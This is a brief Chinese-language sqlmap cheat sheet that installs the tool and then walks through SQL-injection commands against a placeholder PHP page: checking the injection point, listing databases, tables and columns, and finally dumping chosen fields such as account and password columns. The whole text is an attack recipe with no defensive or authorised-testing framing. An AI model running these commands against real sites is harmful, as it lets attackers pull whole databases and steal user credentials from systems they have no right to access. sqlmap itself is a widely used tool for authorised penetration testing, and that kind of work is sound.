sqlmap 安装
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
检查注入点
sqlmap -u http://aa.com/star_photo.php?artist_id=11
爆出所有数据库信息
sqlmap -u http://aa.com/star_photo.php?artist_id=11 --dbs
爆当前数据库信息
sqlmap -u http://aa.com/star_photo.php?artist_id=11 --current-db
指定库名列出所有表
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D aaa --tables
‘aaa’ 为指定数据库名称
指定库名表名列出所有字段
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D aaa -T bbb --columns
‘aaa’ 为指定数据库名称
‘bbb’ 为指定表名称
指定库名表名dump出指定字段
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D aaa -T bbb -C ac,id,password --dump
‘ac,id,password’ 为指定字段名称